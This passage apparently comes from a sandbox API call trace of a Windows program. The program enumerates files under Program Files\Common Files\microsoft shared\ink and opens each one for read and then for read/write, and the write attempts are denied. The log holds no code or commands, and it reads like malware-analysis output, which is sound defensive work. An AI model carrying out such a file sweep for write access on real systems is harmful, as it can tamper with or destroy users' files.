shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.194] GetFileType (hFile=0x27c) returned 0x1 [0099.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0099.194] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.194] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.194] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.194] CloseHandle (hObject=0x27c) returned 1 [0099.194] AreFileApisANSI () returned 1 [0099.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0099.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa8) returned 0x5f2c8 [0099.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x5f2c8, cchWideChar=84 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 84 [0099.195] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.195] GetLastError () returned 0x5 [0099.195] GetLastError () returned 0x5 [0099.195] SetLastError (dwErrCode=0x5) [0099.195] GetLastError () returned 0x5 [0099.195] SetLastError (dwErrCode=0x5) [0099.195] GetLastError () returned 0x5 [0099.195] SetLastError (dwErrCode=0x5) [0099.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0099.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0099.195] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.195] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.195] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0xa6, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x812a8, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0xa6, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧֚")) returned 0 [0099.195] FindClose (in: hFindFile=0x78290 | out: hFindFile=0x78290) returned 1 [0099.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0099.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0099.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0099.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0099.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0099.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46518 | out: hHeap=0x20000) returned 1 [0099.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0099.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0099.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0099.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c998 [0099.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.196] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.196] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.196] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.196] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c998 | out: hHeap=0x20000) returned 1 [0099.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.196] AreFileApisANSI () returned 1 [0099.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml", lpUsedDefaultChar=0x0) returned 76 [0099.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0099.196] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.196] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0099.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0099.196] AreFileApisANSI () returned 1 [0099.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0099.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x84fe0 [0099.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x84fe0, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 76 [0099.197] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0099.197] GetFileType (hFile=0x418) returned 0x1 [0099.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fe0 | out: hHeap=0x20000) returned 1 [0099.197] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.197] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.197] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.197] CloseHandle (hObject=0x418) returned 1 [0099.198] AreFileApisANSI () returned 1 [0099.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0099.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x851c0 [0099.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x851c0, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 76 [0099.198] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.198] GetLastError () returned 0x5 [0099.198] GetLastError () returned 0x5 [0099.198] SetLastError (dwErrCode=0x5) [0099.198] GetLastError () returned 0x5 [0099.198] SetLastError (dwErrCode=0x5) [0099.198] GetLastError () returned 0x5 [0099.198] SetLastError (dwErrCode=0x5) [0099.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x851c0 | out: hHeap=0x20000) returned 1 [0099.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0099.198] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.198] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.198] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0638c00, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a354279, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="insert", cAlternateFileName="")) returned 1 [0099.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0099.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0099.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0099.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0099.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0099.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a660 [0099.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0099.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0099.199] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.199] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.199] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.199] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0099.199] AreFileApisANSI () returned 1 [0099.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert", lpUsedDefaultChar=0x0) returned 72 [0099.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0099.199] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.199] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0099.199] AreFileApisANSI () returned 1 [0099.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0099.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0099.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert") returned 72 [0099.199] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.199] GetLastError () returned 0x5 [0099.199] GetLastError () returned 0x5 [0099.199] SetLastError (dwErrCode=0x5) [0099.199] GetLastError () returned 0x5 [0099.200] SetLastError (dwErrCode=0x5) [0099.200] GetLastError () returned 0x5 [0099.200] SetLastError (dwErrCode=0x5) [0099.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0099.200] AreFileApisANSI () returned 1 [0099.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0099.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0099.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x8a828, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert") returned 72 [0099.200] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.200] GetLastError () returned 0x5 [0099.200] GetLastError () returned 0x5 [0099.200] SetLastError (dwErrCode=0x5) [0099.200] GetLastError () returned 0x5 [0099.200] SetLastError (dwErrCode=0x5) [0099.200] GetLastError () returned 0x5 [0099.200] SetLastError (dwErrCode=0x5) [0099.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0099.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0099.200] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.200] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.200] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.200] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0099.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8abb8 [0099.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0099.200] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="insert.xml", cAlternateFileName="")) returned 1 [0099.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0099.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a8c0 [0099.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0099.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0099.201] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78110 [0099.201] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0638c00, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a354279, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.201] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x387, dwReserved0=0x0, dwReserved1=0x0, cFileName="insertbase.xml", cAlternateFileName="")) returned 1 [0099.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0099.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46a58 [0099.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0099.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0099.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0099.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0099.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0099.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0099.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a2d0 [0099.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0099.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81580 [0099.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.202] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.202] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, 